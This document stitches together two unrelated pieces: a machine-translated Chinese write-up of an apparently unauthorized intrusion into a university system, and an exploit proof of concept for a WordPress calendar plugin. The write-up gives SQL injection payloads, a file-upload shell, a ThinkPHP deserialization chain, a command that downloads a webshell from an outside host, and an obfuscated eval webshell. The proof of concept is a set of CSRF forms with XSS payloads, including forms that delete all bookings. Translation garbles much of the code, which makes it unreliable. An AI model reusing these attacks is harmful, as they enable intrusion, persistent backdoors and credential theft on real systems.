Image

両方のIDパラメーターには、組合注入があります

Image

ペイロードを構築します

)null、null、null、null、null()、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null - null、null、null、null、null、null、null、

図に示すように、current_user情報が正常に取得されました。

'_root@10.40.0.22

ペイロードを構築します

place_id=10)null、null、null、null、group_concat(schema_name)、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null from information _schema.schemata-- ne neqyactive_id=20

Image

ここでは、他のテーブル、列、データを実証しません。文を書いても大丈夫です、それはとても簡単です。

その後、他のシステムに多くのライブラリが関与していることがわかりましたが、私が最も望んでいたコアシステムのライブラリは見つかりませんでした。

0x05鈍いb64アップロード

ファズ関数ポイントの後、私は許可なしに写真をアップロードできる場所を見つけました

http://xxx.xxx.edu.cn/v4/public/weui/demo/form12.html

Image

Image

data:image/jpegが発見されたときにjpeg画像をアップロードします

データをImage/PHPに直接変更し、アップロードされたコンテンツBase64をエンコードして送信します

Image

GetShellが成功し、システムの許可、権利のエスカレーションが救われました

Image

0x06コアシステム素晴らしい浸透(nday desarialization +コマンド実行バイパス +条件付き競争の膨張)

検索、寒くて捨てられた、悲惨で悲惨な、最終的に「Yiban」を制御するコアシステムを見つけました

http://xxx.xxx.edu.cn/v4/public/index.php/admin/login.html?s=admin/api.update/tree

Image

勝利はあなたの目の前にあります.あなたは眠らないとしても彼を殺さなければなりません

あらゆる種類のファズとさまざまな操作が一緒に配置されましたが、私はそれが役に立たないことがわかりました、そして、私はまだ毎日行きませんでした。

あきらめるべきですか?不可能、これは私たちのスタイルではありません

ページJSを注意深くチェックしていたとき、私はそのような興味深い情報を見つけました

Image

私の目が明るくなりました、いまいましいシンカドミン、前に洗練されたnadがありました、それを手配しましょう!

http://xxx.xxx.edu.cn/v4/public/index.php/admin/login.html?s=admin/api.update/tree

Postdata:

ルール=a%3a2%3a%7bi%3a0%3bo%3a17%3a%22think%5cmodel%5cpivot%22%3a11%3a%7bs%3a21%3a%22%00think%5cmodel%00 lazysave%22% 3a1%3bs%3a19%3a%22%00think%5cmodel%00 exists%22%3bb%3a1%3bs%3a13%3a%22%00think%5cmodel% 2%00%2a%00 -connection%22%3bs%3a5%3a%22Mysql%22%3bs%3a7%3a%22%00%2a%00Name%22%3BO%3a17%3a%22thi nk%5cmodel%5cpivot%22%3a11%3a%7bs%3a21%3a%22%00think%5cmodel%00 lazysave%22%3bb%3a1%3bs%3a19%3a %22%00think%5cmodel%00 Exists%22%3bb%3a1%3bs%3a13%3a%22%00%2a%00connection%22%3bs%3a5%3a%22mys QL%22%3bs%3a7%3a%22%00%2a%00Name%22%3bs%3a0%3a%22%22%3bs%3a21%3a%22%00think%5cmodel%00withattr %22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22System%22%3b%7ds%3a9%3a%22%00%2a%00hidden%22 %3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a3%3a%22123%22%3b%7ds%3a17%3a%22%00think%5cmodel%00data% 22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22whoami%22%3b%7ds%3a12%3a%22%00%2a%00withent %22%3bb%3a0%3bs%3a18%3a%22%00think%5cmodel%00フォース%22%3bb%3a1%3bs%3a8%3a%22%00%2a Ba%3a0%3a%7b%7ds%3a9%3a%22%00%2a%00schema%22%3ba%3a0%3a%7b%7d%7ds%3a21%3a%22%00think%5cmodel% 00 withattr%22%3ba%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22%22%3b%7ds%3a9%3a%22%00%2a%00隠し%22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a3%3a%22123%22%3b%7ds%3a17%3a%22%00think%5cmod EL%00DATA%22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22whoami%22%3b%7ds%3a12%3a%22%00%2a%00 withevent%22%3bb%3a0%3bs%3a18%3a%22%00think%5cmodel%00force%22%3bb%3a1%3bs%3a8%3a%22%00%2a%00f IELD%22%3BA%3a0%3a%7b%7ds%3a9%3a%22%00%2a%00schema%22%3ba%3a0%3a%7b%7d%7di%3a1%3bi%3a123%3b%7d //hoamiを実行します

Image

以下は、次のように脱審上のポップチェーンです

?php

名前空間思考;

Think \ model \ pivotを使用してください。

抽象クラスモデル{

private $ lazysave=false; # 保存()

private $が存在する=false; #updatedata()

保護された$接続。

保護された$ name; #__toString()conversion.php=pivot

private $ with withattr=[]; #アサート

保護された$ hidden=[];

private $ data=[];

保護$ withevent=false;

private $ force=false;

保護された$ field=[];

保護された$ schema=[];

function __construct(){

$ this-lazysave=true;

$ this-exists=true;

$ this-withevent=false;

$ this-force=true;

$ this-connection='mysql';

$ this-withattr=['test'='system'];

$ this-data=['test'='whoami'];

$ this-hidden=['test'='123'];

$ this-field=[];

$ this-schema=[];

}

}

名前空間Think \ Model;

Think \ Modelを使用してください。

\#モデルは抽象クラスです。その継承クラスを見つけます。ここでは、ピボットクラスを選択します

クラスピボットはモデルを拡張します{

function __construct($ obj=''){

parent:__construct();

$ this-name=$ obj; #$ This-nameは値をサブクラスコンストラクターに入れ、ベースクラス属性を直接配置して成功せずに初期化します

}

}

$ a=new Pivot();

echo urlencode(serialize([new pivot($ a)、123]));Image

許可はシステムです、ハハハハハハハ、神も私を助けてくれます

しかし、私はEchoコマンドを使用してシェルを書くことに多くの問題に遭遇しました

コマンドはスペースを持つことができず、シェルはコマンドに直接記述されます。そうしないと、エラーが報告されます。

スペースは +に変換され、バックエンドはそれを認識できません

Image

永続的な手動テストの後、 /\はスペースの限界をバイパスできることがわかります

次に、スプライシングコマンドを使用して、書き込み検出をバイパスすることを実現します

しかし、ターゲットマシンにはWAFがあり、数秒後に通常のウェブシェルが殺されます。

なぜだめですか?条件付き競争を通じて直接殺さずにウェブシェルをダウンロードしてください

コンストラクターは、条件付き競争を通じて殺すことなくシェルをダウンロードします

echo/^^?phps1.phpecho/file_put_contents( 's2.php'、file_get_contents( 'http://49.x.x.x:8080/shell.txt'));^gt; gt; gt; s2.php

シェルの内容は次のとおりです

?php

関数テスト($ php_c0d3){

$ password='skr'; //envpwd

$ cr=preg_filter( '/\ s+/'、 ''、 'c h r');

$ bs64=preg_filter( '/\ s+/'、 ''、 'bas e64 _de cod e');

$ gzi=$ cr(103)。$ cr(122)。$ cr(105)。$ cr(110);

$ gzi。=$ cr(102)。$ cr(108)。$ cr(97)。$ cr(116)。$ cr(101);

$ c=$ bs64($ php_c0d3);

$ c=$ gzi($ c);

@eval($ c);

}

$ php_c0d3='s0lny8xl1vavzkjnyslilc5w11ebuex'。

'5RSMA1RXCKGWZEWM2KVFBROGHRSEH0UOGVLISUC'。

'yztqmiaatumvqspfnny1wqarli1wbpraxi1lleh'。

'a2exrgdszrwaa==';

テスト($ php_c0d3);

?ポップチェーンの降下により、ポストダタを生成します

直接電話してください

http://xxx.xxx.edu.cn/v4/public/s2.php

パスワードSKR

直接取ってください

Image

最後に、このチェックイン、レイトコール、出席コアシステム、管理者がライブラリに入り、管理者のパスワードを復号化しました

くそー、あなたはまだ私にレビューを書いてほしいですか?行ってたわごとを食べてください

HireHackking 
source: https://www.securityfocus.com/bid/62269/info

The Event Easy Calendar plugin for WordPress is prone to multiple cross-site request-forgery vulnerabilities.

Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

Event Easy Calendar 1.0.0 is vulnerable; other versions may also be affected. 


f of Concept
========================
Add Customer
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="data-table_length" value="10">
    <input type="hidden" name="radioservice" value="1">
    <input type="hidden" name="hdServiceTypeDDL" value="">  
    <input type="hidden" name="uxTxtControl1" value="new () user com">
    <input type="hidden" name="uxTxtControl2" value="<script>alert(1)</script>">
    <input type="hidden" name="hiddeninputname" value="">   
    <input type="hidden" name="hiddeninputname" value="">   
    <input type="hidden" name="uxHdnTotalCost" value="0.00">
    <input type="hidden" name="param" value="addNewCustomer">
    <input type="hidden" name="action" value="bookingsLibrary">
    <input type="submit" value="Add Customer">
</form>

Update Customer
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="data-table_length" value="10">
    <input type="hidden" name="radioservice" value="2">
    <input type="hidden" name="hdServiceTypeDDL" value="">  
    <input type="hidden" name="uxTxtControl1" value="new () user com">
    <input type="hidden" name="uxTxtControl2" value="NewUser">
    <input type="hidden" name="hiddeninputname" value="">   
    <input type="hidden" name="hiddeninputname" value="">   
    <input type="hidden" name="uxHdnTotalCost" value="100.00">
    <input type="hidden" name="customerId" value="3">
    <input type="hidden" name="uxCustomerEmail" value="new () user com">
    <input type="hidden" name="param" value="upDateCustomer">
    <input type="hidden" name="action" value="bookingsLibrary">
    <input type="submit" value="Update Customer">
</form>

New Booking
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="altField" value="2013-08-15">
    <input type="hidden" name="serviceId" value="2">
    <input type="hidden" name="customerId" value="5">
    <input type="hidden" name="uxCouponCode" value="">  
    <input type="hidden" name="uxNotes" value="">   
    <input type="hidden" name="bookingTime" value="900">
    <input type="hidden" name="param" value="frontEndMutipleDates">
    <input type="hidden" name="action" value="bookingsLibrary">
    <input type="submit" value="New Booking">
</form>

Add Service
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="uxServiceColor" value="#00ff00">
    <input type="text" name="uxServiceName" value="CSRF service<script>alert(1)</script>">
    <input type="hidden" name="uxServiceCost" value="0">
    <input type="hidden" name="uxServiceType" value="0">
    <input type="hidden" name="uxMaxBookings" value="1">
    <input type="hidden" name="uxFullDayService" value="">
    <input type="hidden" name="uxMaxDays" value="1">
    <input type="hidden" name="uxCostType" value="0">
    <input type="hidden" name="uxServiceHours" value="00">
    <input type="hidden" name="uxServiceMins" value="30">
    <input type="hidden" name="uxStartTimeHours" value="9">
    <input type="hidden" name="uxStartTimeMins" value="0">
    <input type="hidden" name="uxStartTimeAMPM" value="AM">
    <input type="hidden" name="uxEndTimeHours" value="5">
    <input type="hidden" name="uxEndTimeMins" value="0">
    <input type="hidden" name="uxEndTimeAMPM" value="PM">
    <input type="hidden" name="param" value="addService">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="Add Service">
</form>

Add Block Out
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="uxExceptionsServices" value="4">
    <input type="hidden" name="uxExceptionsIntervals" value="1">
    <input type="hidden" name="uxExceptionsRepeatDay" value="1">
    <input type="hidden" name="uxExceptionsStartsOn" value="">
    <input type="hidden" name="uxExceptionsStartTimeHours" value="09">
    <input type="hidden" name="uxExceptionsStartTimeMins" value="00">
    <input type="hidden" name="uxExceptionsStartTimeAMPM" value="AM">
    <input type="hidden" name="uxExceptionsEndTimeHours" value="05">
    <input type="hidden" name="uxExceptionsEndTimeMins" value="00">
    <input type="hidden" name="uxExceptionsEndTimeAMPM" value="PM">
    <input type="hidden" name="uxExceptionsDay" value="0">
    <input type="hidden" name="uxExceptionsDayEndsOn" value="">
    <input type="hidden" name="uxExceptionsWeekDay1" value="Sun">
    <input type="hidden" name="uxExceptionsWeekDay2" value="Wed">
    <input type="hidden" name="uxExceptionsRepeatWeeks" value="9">
    <input type="hidden" name="uxExceptionsWeekStartsOn" value="2013-08-22">
    <input type="hidden" name="uxExceptionsWeekStartTimeHours" value="09">
    <input type="hidden" name="uxExceptionsWeekStartTimeMins" value="00">
    <input type="hidden" name="uxExceptionsWeekStartTimeAMPM" value="AM">
    <input type="hidden" name="uxExceptionsWeekEndTimeHours" value="05">
    <input type="hidden" name="uxExceptionsWeekEndTimeMins" value="00">
    <input type="hidden" name="uxExceptionsWeekEndTimeAMPM" value="PM">
    <input type="hidden" name="uxExceptionsWeek" value="0">
    <input type="hidden" name="uxExceptionsWeekEndsOn" value="">
    <input type="hidden" name="param" value="insertExceptionWeeks">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="Add Block Out">
</form>

Add Cupon
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="uxDefaultCoupon" value="XSS<script>alert('xss')</script>">
    <input type="hidden" name="uxValidFrom" value="2013-08-15">
    <input type="hidden" name="uxValidUpto" value="2013-08-22">
    <input type="hidden" name="uxAmount" value="50">
    <input type="hidden" name="uxDdlAmountType" value="1">
    <input type="hidden" name="uxApplicableOnAllProducts" value="1">
    <input type="hidden" name="uxDdlBookingServices" value="4">
    <input type="hidden" name="param" value="addCoupons">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="Add Cupon">
</form>

Default Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="uxDdlDefaultCurrency" value="United States Dollar">
    <input type="hidden" name="uxDdlDefaultCountry" value="United States of America">
    <input type="hidden" name="uxDefaultDateFormat" value="0">
    <input type="hidden" name="uxDefaultTimeFormat" value="0">
    <input type="hidden" name="uxDefaultTimeZone" value="-5.0">
    <input type="hidden" name="uxServiceDisplayFormat" value="0">
    <input type="hidden" name="param" value="updateGeneralSettings">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="Default Settings">
</form>

Reminder Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="uxReminderSettings" value="1">
    <input type="hidden" name="uxReminderInterval" value="1 hour">
    <input type="hidden" name="param" value="UpdateReminderSettings">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="Reminder Settings">
</form>

PayPal Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    Email: <input type="text" name="uxMerchantEmailAddress" placeholder="enter your PayPal email here">
    <input type="hidden" name="uxPayPal" value="1">
    <input type="hidden" name="uxPayPalUrl" value="https://paypal.com/cgi-bin/webscr";>
    <input type="hidden" name="uxThankyouPageUrl" value="http://google.com";>
    <input type="hidden" name="uxCancellationUrl" value="http://google.com";>
    <input type="hidden" name="param" value="UpdatePaymentGateway">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="PayPal Settings">
</form>

Mailchimp Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="uxMailChimp" value="1">
    <input type="hidden" name="uxMailChimpApiKey" value="12345678">
    <input type="hidden" name="uxMailChimpUniqueId" value="87654321">
    <input type="hidden" name="uxDoubleOptIn" value="false">
    <input type="hidden" name="uxWelcomeEmail" value="false">
    <input type="hidden" name="param" value="UpdateAutoResponder">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="Mailchimp Settings">
</form>

Facebook Connect
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="uxFacebookConnect" value="1">
    <input type="hidden" name="uxFacebookAppId" value="12345678">
    <input type="hidden" name="uxFacebookSecretKey" value="87654321">
    <input type="hidden" name="param" value="UpdateFacebookSocialMedia">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="Facebook Connect">
</form>

Auto Approve
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="uxAutoApprove" value="1">
    <input type="hidden" name="param" value="AutoApprove">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="Auto Approve">
</form>

Delete All Bookings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="param" value="DeleteAllBookings">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="Delete All Bookings">
</form>

Restore Factory Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
    <input type="hidden" name="param" value="RestoreFactorySettings">
    <input type="hidden" name="action" value="dashboardLibrary">
    <input type="submit" value="Restore Factory Settings">
</form>